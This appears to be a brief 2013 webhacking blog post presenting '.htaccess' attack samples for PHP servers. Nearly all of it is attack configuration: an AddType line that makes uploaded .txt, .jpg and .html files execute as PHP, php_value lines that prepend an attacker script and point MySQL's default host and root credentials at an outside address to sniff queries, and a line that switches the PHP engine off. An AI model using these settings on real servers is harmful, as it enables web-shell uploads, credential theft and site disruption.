Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/5 »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

.htaccess Attack Sample for PHP

Webhacking | 2013. 3. 4. 01:19 | Posted by binaryU

Upload:
AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt .jpg .cgi
 
Query sniffing:
php_value auto_prepend_file aa.php
php_value mysql.default_host  1.1.1.1
php_value mysql.default_user  root
php_value mysql.default_password  root
 
Engine Off:
php_value engine off

: